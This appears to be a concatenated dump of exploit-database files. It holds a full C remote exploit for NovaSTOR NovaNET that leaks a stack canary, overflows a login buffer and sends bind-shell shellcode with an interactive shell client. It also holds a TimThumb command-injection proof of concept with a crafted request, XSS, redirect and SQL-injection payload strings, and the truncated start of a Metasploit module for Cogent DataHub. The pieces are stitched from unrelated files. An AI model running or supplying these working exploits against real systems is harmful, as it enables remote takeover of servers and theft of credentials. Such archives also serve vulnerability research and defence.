NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability.
/* novanet-own.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit
* by mu-b - Tue Sep 25 2007
*
* - Tested on: NovaSTOR NovaNET 11.0
*
* A remote buffer overflow in the login protocol allows arbitrary
* code execution as SYSTEM, however, the vulnerable function is
* contained in a DLL (nnwindtb.dll) compiled with /gs.
*
* Thus we exploit another vulnerability to remotely read arbitrary
* memory and retrieve the stack canary from nnwindtb.dll @ 0x016A6784.
*
* Note: this was silently fixed in NovaBACKUP NETWORK 13.0
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#define HAS_NULL(a) (((a) - 0x01010101) & ~(a) & 0x80808080)
#define CANARY_VAL(a,b) (a ^ b)
/* offset defines */
#define NTDLL_ESP 0x7C86A01B
/* thread info defines */
#define NOVANET_THREAD_NAME "Sup: Work to Do"
#define NOVANET_TEB_BLKS 2
static struct {
void *teb_start;
int teb_num;
} teb_addrs[2] = { { (void *) 0x7FFDF000, 11 },
{ (void *) 0x7FFB0000, 5 } };
#define WIN32_TEB_SZ 0x1000
/* packet structure defines */
#define NOVANET_HDR_SZ 0x14
#define NOVANET_PKT_SZ 0x92
#define NOVANET_DOMAIN_SZ 0x1F
#define NOVANET_BUF_SZ 0x400
/* memory read defines */
#define NOVANET_READ_SZ sizeof (void *)
#define NOVANET_INT_IDX 32
#define NOVANET_OFFSET 0x100EC480
#define NOVANET_CALC_INT(a) (((int) (a)-NOVANET_OFFSET-16)/sizeof (int))
#define NOVANET_SET_INT(a,b) *((unsigned int *) &a[NOVANET_INT_IDX]) = b;
#define PORT_SHELL 10000
#define NOVANET_TCP_PORT 3817
#define USLEEP_TIME 100000
static char getdomain_buf[] =
"\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00"
"\xff\xff\xff\xff\x08\x40\x80\x00\x16\xaa\x11\x02\x4c\x84\xf4\x01"
"\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00" "digit-labs!$"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00" "Sup: Get Domain Address"
"\x00\x00\xff\xff\x00\x00\x06\x10";
static char ack_buf[] =
"\x51\x84\x00\x00\x00\x00\x00\x30"
"\x05\x00\x00\x00"
"\x18\x00\x00\x00" /* remaining length */
"\x00\x00\x00\x00"
"\x01\x00\x00\x00";
static char hup_buf[] =
"\x56\x84\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x14\x00\x00\x00" /* remaining length */
"\x00\x00\x00\x00";
static char login_buf[] =
"\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00"
"\xff\xff\xff\xff\x09\x20\x80\x00\xcb\x14\x4C\x02\x41\xda\x2e\x02"
"\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
"\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
"\x69\x69\x69" "Dtb: Context"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\x00\x00\x06\x10";
static char rem_buf[] =
"\x51\x84\x00\x00\x02\x02\x02\x32"
"\x18\x00\x00\x00"
"\x00\x00\x00\x00" /* remaining length */
"\x00\x00\x00\x00";
static char win32_x86_bind[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e"
"\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5"
"\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1"
"\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3"
"\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02"
"\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1"
"\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1"
"\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a"
"\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa"
"\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28"
"\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79"
"\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb"
"\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42"
"\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63"
"\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d"
"\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a"
"\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07"
"\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5"
"\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b"
"\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa"
"\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a"
"\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a";
static int
sock_send (int fd, char *src, int len)
{
int n;
if ((n = send (fd, src, len, 0)) < 0)
{
fprintf (stderr, "sock_send: send() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv (int fd, char *dst, int len)
{
int n;
if ((n = recv (fd, dst, len, 0)) < 0)
{
fprintf (stderr, "sock_recv: recv() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
return (n);
}
static void
shellami (int fd)
{
int n;
fd_set rset;
char rbuf[1024];
while (1)
{
FD_ZERO (&rset);
FD_SET (fd, &rset);
FD_SET (STDIN_FILENO, &rset);
if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
{
fprintf (stderr, "shellami: select() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
if (FD_ISSET (fd, &rset))
{
if ((n = sock_recv (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
{
fprintf (stderr, "shellami: connection closed by foreign host.\n");
exit (EXIT_SUCCESS);
}
rbuf[n] = '\0';
printf ("%s", rbuf);
fflush (stdout);
}
if (FD_ISSET (STDIN_FILENO, &rset))
{
if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
{
rbuf[n] = '\0';
sock_send (fd, rbuf, n);
}
}
}
}
static int
sockami (char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int fd;
if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
fprintf (stderr, "sockami: socket() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
if ((hp = gethostbyname (host)) == NULL)
{
fprintf (stderr, "sockami: gethostbyname() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
{
fprintf (stderr, "sockami: connect() - %s\n", strerror (errno));
return (-1);
}
return (fd);
}
static void
novanet_read_pkt_init (char *pkt)
{
char *ptr = pkt;
/* add packet header */
*ptr++ = 0x54;
*ptr++ = 0x84;
/* add padding */
memset (ptr, 0x00, 0x1E);
ptr += 0x1E;
/* add our dodgy-int */
memset (ptr, 0x69, sizeof (int));
ptr += sizeof (int);
memset (ptr, 0x00, NOVANET_PKT_SZ-(ptr-pkt));
}
static int
novanet_read (char *host, void *start, void *dst)
{
fd_set r_fds;
struct timeval tv;
int fd, n;
char buf[NOVANET_PKT_SZ], rbuf[NOVANET_PKT_SZ];
novanet_read_pkt_init (buf);
start = (void *) NOVANET_CALC_INT (start);
fd = sockami (host, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_read: sockami failed\n");
exit (EXIT_FAILURE);
}
NOVANET_SET_INT (buf, (unsigned int) start);
if ((n = sock_send (fd, buf, sizeof buf)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_read: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
return (0);
}
FD_ZERO (&r_fds);
FD_SET (fd, &r_fds);
tv.tv_sec = 4; /* wait 4 seconds */
tv.tv_usec = 0;
n = select (fd + 1, &r_fds, NULL, NULL, &tv);
if (n == -1)
{
fprintf (stderr, "novanet_read: select() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
else if (n)
{
if ((n = sock_recv (fd, rbuf, sizeof rbuf)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_read: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
return (0);
}
}
else
{
fprintf (stderr, "novanet_read: select timeout, we may have crashed NovaNET :(\n");
exit (EXIT_FAILURE);
}
memcpy (dst, &rbuf[NOVANET_INT_IDX], sizeof (void *));
usleep (USLEEP_TIME);
close (fd);
return (1);
}
static void
novanet_read_str (char *host, void *start, char *dst, int dst_len)
{
char r_val[NOVANET_READ_SZ], *ptr;
void *r_addr;
int nbytes;
nbytes = 0;
ptr = dst;
r_addr = start;
do
{
if (novanet_read (host, r_addr, &r_val) == 0)
break;
strncpy (ptr, r_val, 4);
if (HAS_NULL (*(int *) r_val))
break;
ptr += 4;
r_addr += 4;
nbytes += 4;
}
while (nbytes < dst_len - 5);
}
static int
novanet_map_process (char *host, int *esp_val)
{
void *r_addr, *teb_addr, *thr_list, *arg_addr;
int i, j, num_threads, thr_count;
char r_buf[NOVANET_BUF_SZ];
r_addr = (void *) 0x10133C60 + 0x12510;
if (novanet_read (host, r_addr, &thr_count) == 0)
return (-1);
printf ("** [nnwinsup.dll @ 0x10133C60+0x12510] thread list used: 0x%08X\n",
thr_count);
num_threads = 0;
r_addr = (void *) 0x10133C60 + 0xB938;
if (novanet_read (host, r_addr, &thr_list) == 0)
return (-1);
printf ("*** [nnwinsup.dll @ 0x10133C60+0x0B938] head ptr: 0x%08X\n", (int) thr_list);
arg_addr = NULL;
while ((r_addr = thr_list))
{
if (novanet_read (host, r_addr, &thr_list) == 0)
return (-1);
novanet_read_str (host, r_addr + 0xE8, r_buf, sizeof r_buf);
printf ("*** [nnwinsup.dll @ 0x%08X] next ptr: 0x%08X, name: \"%s\"\n",
(int) r_addr, (int) thr_list, r_buf);
if (strcmp (r_buf, NOVANET_THREAD_NAME) == 0)
arg_addr = r_addr;
if (thr_list != NULL)
num_threads++;
}
printf ("** [nnwinsup.dll @ 0x10133C60+0x0B938] thread count: %d\n", num_threads);
if (arg_addr == NULL)
return (-1);
for (i = 0; i < NOVANET_TEB_BLKS; i++)
{
teb_addr = teb_addrs[i].teb_start - WIN32_TEB_SZ;
printf ("** [TEB BLK @ 0x%08X] scanning %d blocks\n", (int) teb_addr, teb_addrs[i].teb_num);
for (j = 0; j < teb_addrs[i].teb_num; j++, teb_addr -= WIN32_TEB_SZ)
{
int st_addr, sb_addr, thr_id;
void *thr_arg;
r_addr = teb_addr + 0x04;
if (novanet_read (host, r_addr, &st_addr) == 0)
break;
r_addr = teb_addr + 0x08;
if (novanet_read (host, r_addr, &sb_addr) == 0)
break;
r_addr = teb_addr + 0x24;
if (novanet_read (host, r_addr, &thr_id) == 0)
break;
if (st_addr != 0xFFFFFFFF)
{
r_addr = (void *) st_addr - 0x7C;
if (novanet_read (host, r_addr, &thr_arg) == 0)
break;
}
else
thr_arg = (void *) 0xDEADBEEF;
printf ("** [TEB @ 0x%08X] thread id: %04X, stack base: 0x%08X, top: 0x%08X, arg: 0x%08X\n",
(int) teb_addr, thr_id, sb_addr, st_addr, (int) thr_arg);
if (thr_arg == arg_addr)
{
printf ("** [TEB @ 0x%08X] found thread id: %04X, stack top: 0x%08X, ESP: 0x%08X\n",
(int) teb_addr, thr_id, st_addr, st_addr - 0x444);
*esp_val = st_addr - 0x444;
return (0);
}
}
}
return (-1);
}
static void
novanet_get_domain (char *thost, char *d_name)
{
char rbuf_hdr[NOVANET_HDR_SZ], rbuf_pkt[NOVANET_PKT_SZ], *pkt_ptr;
int fd, n, rlen;
fd = sockami (thost, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_get_domain: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
printf ("** sending getdomain_buf packet...");
if ((n = sock_send (fd, getdomain_buf, sizeof getdomain_buf - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading first reply...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
memcpy (d_name, &rbuf_pkt[0x54], NOVANET_DOMAIN_SZ);
printf ("** remote domain address: %.*s\n", NOVANET_DOMAIN_SZ, d_name);
printf ("** sending ack packet...");
if ((n = sock_send (fd, ack_buf, sizeof ack_buf - 1)) != NOVANET_HDR_SZ + 4)
{
fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ + 4);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading second reply...");
if ((n = sock_recv (fd, rbuf_hdr, sizeof rbuf_hdr)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
rlen = *(unsigned int *) &rbuf_hdr[12];
if (rlen < NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_get_domain: remaining length invalid (<%d)\n",
NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
rlen -= NOVANET_HDR_SZ;
printf ("** reading %d-remaining bytes...", rlen);
pkt_ptr = malloc (rlen * sizeof (char));
if ((n = sock_recv (fd, pkt_ptr, rlen)) != rlen)
{
fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
n, rlen);
exit (EXIT_FAILURE);
}
printf ("done\n");
free (pkt_ptr);
printf ("** sending hup packet...");
if ((n = sock_send (fd, hup_buf, sizeof hup_buf - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n\n");
usleep (USLEEP_TIME);
close (fd);
}
static void
novanet_own_process (char *thost, char *d_name, int esp_val)
{
char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
int canary_val, fd, n, rlen;
if (novanet_read (thost, (void *) 0x016A6784, &canary_val) == 0)
{
fprintf (stderr, "novanet_own_process: reading canary failed\n");
exit (EXIT_FAILURE);
}
fd = sockami (thost, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_own_process: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("** [nnwindtb.dll @ 0x016A6784] stack canary: 0x%08X\n\n", (int) canary_val);
if (HAS_NULL (CANARY_VAL(canary_val, esp_val)))
{
fprintf (stderr, "novanet_own_process: canary value invalid :(\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);
printf ("** sending login packet...");
if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading fourth packet...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
rlen = 0x10C + 64 + (sizeof win32_x86_bind - 1) + 1;
*(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;
printf ("** sending remaining %d-bytes packet...", rlen);
if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** sending hammer packet...");
ptr = malloc (rlen * sizeof (char));
memset (ptr, 0x41, rlen);
*(unsigned int *) &ptr[0x104] = CANARY_VAL(canary_val, esp_val);
*(unsigned int *) &ptr[0x108] = NTDLL_ESP;
memcpy (&ptr[0x10C + 64], win32_x86_bind, sizeof win32_x86_bind - 1);
ptr[rlen - 1] = '\0';
if ((n = sock_send (fd, ptr, rlen)) != rlen)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, rlen);
exit (EXIT_FAILURE);
}
free (ptr);
printf ("done\n\n");
usleep (USLEEP_TIME);
close (fd);
printf ("* waiting for the shellcode to be executed...\n");
sleep (2);
if ((fd = sockami (thost, PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (fd);
}
}
int
main (int argc, char **argv)
{
char d_name[NOVANET_DOMAIN_SZ];
int esp_val;
printf ("NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if (argc < 2)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
esp_val = 0xdeadbeef;
printf ("* mapping remote process...\n");
if (novanet_map_process (argv[1], &esp_val) < 0)
{
fprintf (stderr, "novanet_map_process: unable to locate thread :(\n");
exit (EXIT_SUCCESS);
}
printf ("* done\n\n");
novanet_get_domain (argv[1], d_name);
novanet_own_process (argv[1], d_name, esp_val);
return (EXIT_SUCCESS);
}

201
platforms/php/webapps/33851.txt Executable file
View file

@ -0,0 +1,201 @@
######################################################################
# _ ___ _ _ ____ ____ _ _____
# | | / _ \| \ | |/ ___|/ ___| / \|_ _|
# | | | | | | \| | | _| | / _ \ | |
# | |__| |_| | |\ | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/ \_\_|
#
# Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)
# Affected website : a lot Wordpress Themes, Plugins, 3rd party components
# Exploit Author : @u0x (Pichaya Morimoto)
# Release dates : June 24, 2014
#
# Special Thanks to 2600 Thailand group
# : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################
[+] Description
============================================================
TimThumb is a small php script for cropping, zooming and resizing web
images (jpg, png, gif). Perfect for use on blogs and other applications.
Developed for use in the WordPress theme Mimbo Pro, and since used in many
other WordPress themes.
http://www.binarymoon.co.uk/projects/timthumb/
https://code.google.com/p/timthumb/
The original project WordThumb 1.07 also vulnerable (
https://code.google.com/p/wordthumb/)
They both shared exactly the same WebShot code! And there are several
projects that shipped with "timthumb.php", such as,
Wordpress Gallery Plugin
https://wordpress.org/plugins/wordpress-gallery-plugin/
IGIT Posts Slider Widget
http://wordpress.org/plugins/igit-posts-slider-widget/
All themes from http://themify.me/ contains vulnerable "wordthumb" in
"<theme-name>/themify/img.php".
[+] Exploit
============================================================
http://
<wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://
<wp-website>$(<os-cmds>)
** Note that OS commands payload MUST be within following character sets:
[A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]
** Spaces, Pipe, GT sign are not allowed.
** This WebShot feature is DISABLED by default.
** CutyCapt and XVFB must be installed in constants.
[+] Proof-of-Concept
============================================================
There are couple techniques that can be used to bypass limited charsets but
I will use a shell variable $IFS insteads of space in this scenario.
PoC Environment:
Ubuntu 14.04 LTS
PHP 5.5.9
Wordpress 3.9.1
Themify Parallax Theme 1.5.2
WordThumb 1.07
Crafted Exploit:
http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat)
GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=
http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1
Host: longcatlab.local
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/35.0.1916.153 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: woocommerce_recently_viewed=9%7C12%7C16;
wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce;
wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685
HTTP/1.1 400 Bad Request
Date: Tue, 24 Jun 2014 07:20:48 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 3059
Connection: close
Content-Type: text/html
<a href='http://www.php.net/function.getimagesize'
target='_new'>getimagesize</a>
( )</td><td
title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php'
bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr>
</table></font>
<h1>A WordThumb error has occured</h1>The following error(s) occured:<br
/><ul><li>The image being resized is not a valid gif, jpg or
png.</li></ul><br /><br />Query String : webshot=1&src=
http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version :
1.07</pre>
Even it response with error messages but injected OS command has already
been executed.
$ ls /tmp/longcat -lha
- -rw-r--r-- 1 www-data www-data 0 ??.?. 24 14:20 /tmp/longcat
[+] Vulnerability Analysis
============================================================
https://timthumb.googlecode.com/svn/trunk/timthumb.php
Filename: timthumb.php
if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);
if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT',
'/usr/local/bin/CutyCapt');
if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run');
...
timthumb::start(); ? start script
...
public static function start(){
$tim = new timthumb(); ? create timthumb object, call __construct()
...
$tim->run();
...
public function __construct(){
...
$this->src = $this->param('src'); ? set "src" variable to HTTP GET "src"
parameter
if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){
...
$this->isURL = true; ? prefix http/s result in isURL = true
}
...
protected function param($property, $default = ''){
if (isset ($_GET[$property])) {
return $_GET[$property];
...
public function run(){
if($this->isURL){
...
if($this->param('webshot')){ ? HTTP GET "webshot" must submitted
if(WEBSHOT_ENABLED){ ? this pre-defined constant must be true
...
$this->serveWebshot(); ? call webshot feature
} else {
...
protected function serveWebshot(){
...
if(! is_file(WEBSHOT_CUTYCAPT)){ ? check existing of cutycapt
return $this->error("CutyCapt is not installed. $instr");
}
if(! is_file(WEBSHOT_XVFB)){ ? check existing of xvfb
return $this->Error("Xvfb is not installed. $instr");
}
...
$url = $this->src;
if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ? check valid
URL #LoL
return $this->error("Invalid URL supplied.");
}
$url =
preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/',
'', $url); ? check valid URL as specified in RFC 3986
http://www.ietf.org/rfc/rfc3986.txt
...
if(WEBSHOT_XVFB_RUNNING){
putenv('DISPLAY=:100.0');
$command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\"
--javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
--js-can-open-windows=off --url=\"$url\" --out-format=$format
--out=$tempfile"; ? OS shell command injection
} else {
$command = "$xv --server-args=\"-screen 0,
{$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout
--user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
--js-can-open-windows=off --url=\"$url\" --out-format=$format
--out=$tempfile"; ? OS shell command injection
}
...
$out = `$command`; ? execute $command as shell command
"PHP supports one execution operator: backticks (``). Note that these are
not single-quotes! PHP will attempt to execute the contents of the
backticks as a shell command." -
http://www.php.net//manual/en/language.operators.execution.php
"$url" is failed to escape "$()" in "$command" which is result in arbitrary
code execution.

10
platforms/php/webapps/33870.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/39648/info
FlashCard is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
FlashCard 2.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/flashcard/stateless/cPlayer.php?id="><iframe
src=http://www.google.de

18
platforms/php/webapps/33874.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/39679/info
Ektron CMS400.NET is prone to multiple security vulnerabilities, including multiple cross-site scripting issues, an information-disclosure issue, a cookie-manipulation issue, a directory-traversal issue, a security-bypass issue, and a URI redirection issue.
Attackers can leverage these issues to bypass authentication mechanisms, execute arbitrary script code in the browser of an unsuspecting user in the context of an affected site, steal cookie-based authentication credentials, obtain sensitive information, bypass certain security restrictions, and redirect a user to a potentially malicious site; other attacks are also possible.
Ektron CMS400.NET 7.5.2.49 is affected; other versions may also be vulnerable.
The following example URIs are available:
Cross-Site Scripting issue:
http://www.example.com/WorkArea/reterror.aspx?info=<script>alert('vulnerable')</script>
http://www.example.com/workarea/medialist.aspx?action=ViewLibraryByCategory&selectids='; alert('Vulnerable');//
URI Redirection issue:
http://www.example.com/workarea/blankredirect.aspx?http://www.example2.com

12
platforms/php/webapps/33875.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/39685/info
HuronCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Huron CMS 8 11 2007 is vulnerable; other versions may also be affected.
The following example data are available:
Username: 'or 1=1/*
Password: 'or 1=1/*

448
platforms/windows/remote/33880.rb Executable file
View file

@ -0,0 +1,448 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
# Exploitation is reliable, but the service hangs and needs manual restarting.
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize
super(
'Name' => 'Cogent DataHub Command Injection',
'Description' => %q{
This module exploits an injection vulnerability in Cogent DataHub prior
to 7.3.5. The vulnerability exists in the GetPermissions.asp page, which
makes insecure use of the datahub_command function with user controlled
data, allowing execution of arbitrary datahub commands and scripts. This
module has been tested successfully with Cogent DataHub 7.3.4 on
Windows 7 SP1.
},
'Author' => [
'John Leitch', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'Platform' => 'win',
'References' =>
[
['ZDI', '14-136'],
['CVE', '2014-3789'],
['BID', '67486']
],
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => {
'WfsDelay' => 30,
'InitialAutoRunScript' => 'migrate -f'
},
'Targets' =>
[
[ 'Cogent DataHub < 7.3.5', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 29 2014'
)
register_options(
[
